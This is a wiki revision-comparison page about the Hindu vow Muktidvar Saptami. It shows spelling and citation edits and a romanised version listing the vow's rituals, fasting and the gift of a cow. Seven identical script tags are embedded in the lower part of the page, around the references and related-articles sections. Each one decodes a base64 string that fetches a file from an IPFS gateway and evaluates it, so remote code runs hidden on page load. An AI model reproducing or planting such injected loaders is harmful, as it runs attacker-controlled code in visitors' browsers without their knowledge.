Difference between revisions of "मुक्तिद्वार सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*जब [[सप्तमी]] को [[हस्त नक्षत्र]] हो या [[पुण्य नक्षत्र]] हो तो यह व्रत किया जाना चाहिए।  
+
*जब [[सप्तमी]] को [[हस्त नक्षत्र]] हो या [[पुष्य नक्षत्र]] हो तो यह व्रत किया जाना चाहिए।  
 
*कर्ता को 'अर्क' के 'प्रणाम' के साथ अर्क की टहनी से अपने दाँत स्वच्छ करने चाहिए।  
 
*कर्ता को 'अर्क' के 'प्रणाम' के साथ अर्क की टहनी से अपने दाँत स्वच्छ करने चाहिए।  
 
*होम, गोबर से लीपे गए आँगन में लाल चन्दन के लेप से एक षोडश दल कमल बनाना चाहिए; जिसके प्रत्येक दल पर पूर्व से आरम्भ कर कतिपय देवों को प्रतिष्ठापित करना चाहिए।  
 
*होम, गोबर से लीपे गए आँगन में लाल चन्दन के लेप से एक षोडश दल कमल बनाना चाहिए; जिसके प्रत्येक दल पर पूर्व से आरम्भ कर कतिपय देवों को प्रतिष्ठापित करना चाहिए।  
 
*तब आहावान से आरम्भ कर अन्य उपचार सम्पादिन करने चाहिए।  
 
*तब आहावान से आरम्भ कर अन्य उपचार सम्पादिन करने चाहिए।  
*उस दिन उपवास; एक वर्ष तक, छ: रसों (मधुर, लवण, तिक्त, कषाय, कटु, अम्ल) में किसी एक को दो मास तक खाना चाहिए और तेरहवें [[मास]] में [[पारण]] तथा एक कपिला गाय का दान; मोक्ष प्राप्ति कराता है <ref>हेमाद्रि (व्रत0 2, 780-783)</ref>ऐसी मान्यता है।
+
*उस दिन उपवास; एक वर्ष तक, छ: रसों (मधुर, लवण, तिक्त, कषाय, कटु, अम्ल) में किसी एक को दो मास तक खाना चाहिए और तेरहवें [[मास]] में [[पारण]] तथा एक कपिला गाय का दान; मोक्ष प्राप्ति कराता है।<ref>हेमाद्रि (व्रत0 2, 780-783</ref> ऐसी मान्यता है।
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:49, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab saptami ko hast nakshatr ho ya pushy nakshatr ho to yah vrat kiya jana chahie.
  • karta ko 'ark' ke 'pranam' ke sath ark ki tahani se apane daant svachchh karane chahie.
  • hom, gobar se lipe ge aangan mean lal chandan ke lep se ek shodash dal kamal banana chahie; jisake pratyek dal par poorv se arambh kar katipay devoan ko pratishthapit karana chahie.
  • tab ahavan se arambh kar any upachar sampadin karane chahie.
  • us din upavas; ek varsh tak, chh: rasoan (madhur, lavan, tikt, kashay, katu, aml) mean kisi ek ko do mas tak khana chahie aur terahavean mas mean paran tatha ek kapila gay ka dan; moksh prapti karata hai.[1] aisi manyata hai.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 2, 780-783

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>